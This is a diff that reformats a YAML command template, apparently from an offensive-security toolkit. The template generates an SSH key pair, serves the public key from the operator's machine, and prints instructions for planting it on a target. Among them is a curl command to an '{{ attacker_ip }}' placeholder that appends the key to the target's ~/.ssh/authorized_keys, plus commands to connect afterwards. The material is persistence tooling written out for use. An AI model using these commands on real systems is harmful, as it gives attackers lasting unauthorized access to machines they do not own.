--- a/src/profi/templates/scripts/deliver-linux-ssh-key.yaml
+++ b/src/profi/templates/scripts/deliver-linux-ssh-key.yaml
@@ -1,15 +1,16 @@
+---
 metadata:
-  filename: deliver-linux-ssh-key.yaml
-  tags:
-  - linux
-  created: '2025-03-29'
-  author: Unknown
-content: "mkdir -p packstation/outbound; ssh-keygen -t rsa -b 4096 -f ~/.ssh/id69_rsa\
-  \ -N \"\"; cp -n ~/.ssh/id69_rsa.pub packstation/outbound/; \\\necho '================================================================';\
-  \ \\\necho '                       -----Linux------                         '; \\\
-  \necho 'Deliver (without credentials): mkdir -p ~/.ssh && curl http://{{ attacker_ip\
-  \ }}:{{ delivery_outbound_port }}/id69_rsa.pub >> ~/.ssh/authorized_keys'; \\\n\
-  echo 'Deliver (with credentials): ssh-copy-id -i ~/.ssh/id69_rsa <user>@<remote_ip>'\n\
-  echo 'Connect to box: ssh -i ~/.ssh/id69_rsa <user>@<remote_ip>'\necho '================================================================';\
-  \ \\\n python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{\
-  \ delivery_outbound_port }} -d packstation/outbound\n"
+  filename: "deliver-linux-ssh-key.yaml"
+  tags: ["linux"]
+  created: "2025-03-29"
+  author: "Unknown"
+
+content: |
+  mkdir -p packstation/outbound; ssh-keygen -t rsa -b 4096 -f ~/.ssh/id69_rsa -N ""; cp -n ~/.ssh/id69_rsa.pub packstation/outbound/; \
+  echo '================================================================'; \
+  echo '                       -----Linux------                         '; \
+  echo 'Deliver (without credentials): mkdir -p ~/.ssh && curl http://{{ attacker_ip }}:{{ delivery_outbound_port }}/id69_rsa.pub >> ~/.ssh/authorized_keys'; \
+  echo 'Deliver (with credentials): ssh-copy-id -i ~/.ssh/id69_rsa <user>@<remote_ip>'
+  echo 'Connect to box: ssh -i ~/.ssh/id69_rsa <user>@<remote_ip>'
+  echo '================================================================'; \
+  python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port }} -d packstation/outbound
